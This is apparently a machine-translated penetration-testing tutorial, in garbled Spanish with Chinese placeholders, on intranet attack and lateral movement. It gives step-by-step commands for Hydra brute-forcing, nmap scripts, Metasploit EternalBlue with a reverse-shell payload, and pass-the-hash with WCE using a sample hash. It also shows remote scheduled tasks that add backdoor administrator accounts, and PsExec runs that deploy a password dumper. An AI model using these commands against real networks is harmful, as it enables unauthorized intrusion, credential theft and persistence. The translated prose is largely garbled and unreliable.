port Scan
el puerto y el ataque común
método de exploración específica Haga clic aquí para ir a mi otro artículo, que detalla el uso de la herramienta de escaneo de puertos
escaneo contraseña débil
escaneo contraseña débil, por ejemplo, MySQL, VNC, RDP, http gestión y otras contraseñas débiles para iniciar sesión en el servicio, puede utilizar algunas de las herramientas de escaneo débiles contraseña, XSCAN, hidra, medusa, nmap y así sucesivamente. También puede encontrarse más y mejores herramientas
hidra
1. En primer lugar abierto que los puertos con nmap exploración
2. El uso de contraseña débil hidra puede escaneando el escaneo de puertos
hydra -L user.txt -P pass.txt 192.168.16.137(爆破的ip) smb(爆破的服务名)
-l nombre de usuario especificado -L designado voladura de voladura voladuras nombre de usuario designado -p diccionario -P contraseña especifica la contraseña de voladura diccionario
guión nmap
guiones bajo el directorio de instalación namp: ruta del script
guión voladuras: bruta script de detección de la vulnerabilidad: VULN
uso
nmap -p 脚本正针对的端口 --script 脚本名 要攻击的ip
msfconsole
1. Entra en el msfconsole
2. Comprobar la vulnerabilidad de la escritura correspondiente disponibles
search 17_010
3. Salida algunos scripts exploración de vulnerabilidades
use auxiliary/scanner/
4. Uso de una máquina vulnerable a escanear el guión indicado en el segmento de red
use auxiliary/scanner/smb/smb_ms17_010
set threads 10
set rhosts 要扫描的网段/24
exploit
5. Seleccione el dispositivo apropiado vulnerables a los ataques de exp
use exploit/windows/smb/ms17_010_eternalblue
set lhost 本机ip
set rhosts 要攻击的ip/32
set payload windows/x64/meterpreter/reverse_tcp
exploit
la inyección de hash
principio
principio de inyección de hash es que los usuarios locales o de dominio que hemos preparado un buen picadillo inyectado en marcha proceso de autenticación lsass.exe local del equipo de destino, de modo que es como si inician sesión en el equipo local al mismo uso del tiempo ipc sesión para aprovechar el equipo de destino autoridad. Para hash de equipo de destino de usuario local o de dominio cómo conseguirlo para reproducir su propia imaginación, el hash de inyección en sí con el fin de tratar con aquellos que no pueden agrietarse NTLM HASH
método
1. En primer lugar el uso WCE obtener un valor hash de la máquina dentro de la red, y no puede romperse demasiado complejo
wce -l
2. Debido al uso, contraseña de red muchas máquinas en muchos casos es el mismo (cuando el mismo valor hash de la contraseña es la misma)
3. En las otras máquinas de tratar de conseguir el hash al aterrizaje, el destino puede ser el mismo que si la contraseña de cuenta
1. Obtener el nombre de destino o nombre de dominio
ping -a 目标机ip
2. Antes de obtener el valor hash utilizando el aterrizaje, no hay sustituto ntlmhash disponible 0
wce.exe -s Administrator:WIN-P68FLB30G1I:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942
3. El acceso remoto a la máquina de destino unidad C compartir archivos por defecto
dir \\目标机ip\c$
La placa objetivo 4. c asignado a la máquina local
net use z: \\目标机ip\c$
procedimientos de conexión y la ejecución remota
Agregar tarea programada
en las tareas programadas
prestar atención
Caso de uso: obtener la contraseña de cuentas de equipo de destino, pero no pueden conexión de escritorio remoto
necesidades para abrir el servicio Programador de tareas
1. El uso por defecto IPC $ compartió conexión remota a la máquina de destino
net use \\目标机ip /user:administrator 密码
2. Comprobar el tiempo objetivo
net time \\目标机ip
3. Añadir a la ejecución de tareas programadas
3.1 Ejecución de comandos directa
at \\目标机ip 时间 命令
Ejemplo:
Crear un usuario
at \\192.168.16.158 12:50 net user zs 123.com /add
Agregue el usuario al grupo de administradores
at \\192.168.16.158 12:50 localgroup administrators zs /add
3.2 utilizando un script
Crear un archivo bat, contenido para crear un nuevo usuario y añadirlo al grupo de administradores
Copiar el archivo a la máquina de destino bate
copy 1.bat \\目标机ip\c$\1.bat
Agregar tarea programada para ejecutar este script
at \\目标机ip 时间 脚本路径
4. Revisar el equipo de destino en una lista de todas las tareas
at \\192.168.16.158
Add schtasks ejecución de la tarea programada
Tenga en cuenta
el uso de la situación: para obtener la contraseña de cuentas de equipo de destino, pero pueden conexión de escritorio remoto no
necesita encender el sistema después de que el servicio Programador de tareas 2003 antes de poder utilizar
1. Crear un archivo bat, contenido para crear un nuevo usuario y agregarlo al grupo de administradores
2. El uso predeterminado IPC $ compartió conexión remota a la máquina de destino
net use \\目标机ip /user:administrator 密码
3. copiar el archivo en el bate equipo de destino
copy 1.bat \\目标机ip\c$\1.bat
4. Revisar el tiempo objetivo
net time \\目标机ip
5. Introduzca el siguiente comando schtasks Agregar tarea programada
schtasks /create /tn aa /tr 脚本路径 /sc once /st 时间 /S 目标机ip /U 用户名 /P 密码 /RU system
Plus sistema / RU se lleva a cabo por el sistema del usuario, también se puede quitar, la secuencia de comandos se puede sustituir con un solo comando camino
6. Plan de aplicación directa no es una ejecución de la tarea
schtasks /run /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码
7. Tareas programadas Eliminar
schtasks /F /delete /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码
la ejecución remota de psexec
1. El uso de software local de la carga remota al objetivo
net use \\目标机ip\c$ /user:administrator 密码
copy wce.exe \\目标机ip\c$\
2. Realizar programas locales de destino
PsExec.exe \\目标机ip –accepteula -u 用户 -p 密码 执行的程序
Jugará el primer cuadro Ejecutar, escriba -accepteula este parámetro puede pasar por alto
3. Use psexec propios parámetros locales del programa se cargan en el equipo de destino, eliminan automáticamente después de la ejecución
Psexec.exe \\目标机ip -u 用户 -p 密码 -c QuarksPwDump.exe -d
-c <[ruta] archivo>: copiar el archivo a la máquina remota y ejecutar (Nota: El archivo se elimina automáticamente después del final de la carrera)
-d está sin esperar a que el programa para regresar a fin